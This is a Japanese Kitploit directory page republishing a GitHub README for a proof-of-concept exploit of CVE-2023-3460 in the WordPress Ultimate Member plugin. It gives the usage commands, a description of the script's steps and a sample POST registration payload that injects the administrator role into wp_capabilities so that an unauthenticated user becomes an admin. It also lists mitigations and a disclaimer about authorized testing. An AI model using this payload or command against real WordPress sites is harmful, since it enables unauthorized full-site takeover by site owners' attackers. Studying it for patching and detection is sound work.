Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2023-3460 — CVE-2023-3460 の概念実証エクスプロイト、WordPress Ultimate Member の権限昇格の脆弱性。細工された登録リクエストを介して管理者アカウントを作成します。許可されたテストのみを対象としています。 | Kitploit
ツール/GitHubGitHub/gurjotexpert/cve-2023-3460
特権昇格脆弱性分析エクスプロイトウェブアプリケーション悪用ウェブセキュリティペネトレーションテスト学習と教育
GitHubgurjotexpert/cve-2023-3460

CVE-2023-3460

CVE-2023-3460 の概念実証エクスプロイト、WordPress Ultimate Member の権限昇格の脆弱性。細工された登録リクエストを介して管理者アカウントを作成します。許可されたテストのみを対象としています。

リポジトリを見る
111年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

🚨 CVE-2023-3460 - WordPress Ultimate Member 権限昇格エクスプロイト

これは、WordPressプラグインUltimate Memberの深刻な脆弱性であるCVE-2023-3460の概念実証(PoC)エクスプロイトです。これにより、認証されていないユーザーが悪意のある登録リクエストを作成して権限を管理者に昇格させることができます。

🔥 影響: 不正な管理者アカウントの作成によるサイト全体の侵害


📌 脆弱性の詳細

  • 影響を受けるプラグイン: Ultimate Member
  • 影響を受けるバージョン: 2.6.6以下
  • 修正バージョン: 2.6.7
  • エクスプロイトの種類: 登録悪用による権限昇格
  • 認証の必要性: ❌ なし
  • CVE: CVE-2023-3460

⚙️ 必要条件

  • Python 3
  • requests ライブラリ
  • urllib3 ライブラリ
  • beautifulsoup4 ライブラリ

必要条件のインストール:

root@kitploit:~
pip3 install requests urllib3 beautifulsoup4

🧪 エクスプロイトの使用方法

root@kitploit:~
python3 CVE-2023-3460.py -t <TARGET_URL> -u <NEW_USERNAME> -p <NEW_PASSWORD> 

✅ 例:

root@kitploit:~
python3 CVE-2023-3460.py -t http://localhost/register/ -u pwnadmin -p Pass@123 

📥 エクスプロイトスクリプトの機能

  • 登録ページからCSRF nonce(_wpnonce)を取得
  • フォーム検証をバイパス
  • wp_capabilitiesにadministratorロールを注入
  • 認証なしで新しい管理者ユーザーを作成

🔐 サンプルエクスプロイトペイロード

root@kitploit:~
POST /register/ HTTP/1.1
Content-Type: application/x-www-form-urlencoded

user_login=pwnadmin&
[email protected]&
user_password=Pass@123&
wp_càpabilities[administrator]=1&
_um_nonce=<nonce_value>

🛡️ 緩和策

  • Ultimate Memberプラグインをv2.6.7以上に更新
  • 不要な場合はオープン登録を無効化
  • 不審なアクティビティのためにユーザー作成ログを監視

📚 参考情報

  • 🔗 Patchstack Advisory
  • 🔗 CVE-2023-3460 on NVD

⚠️ 免責事項

このスクリプトは教育および許可されたテスト目的のみで提供されます。システムの不正な悪用は違法であり、非倫理的です。所有しているかテストする許可があるシステムでのみ使用してください。


👨‍💻 作成者

  • 💀 [GURJOT SINGH]
  • 🔒 [Linkdin: https://in.linkedin.com/in/gurjot-singh-8198b3220]
ツールをダウンロード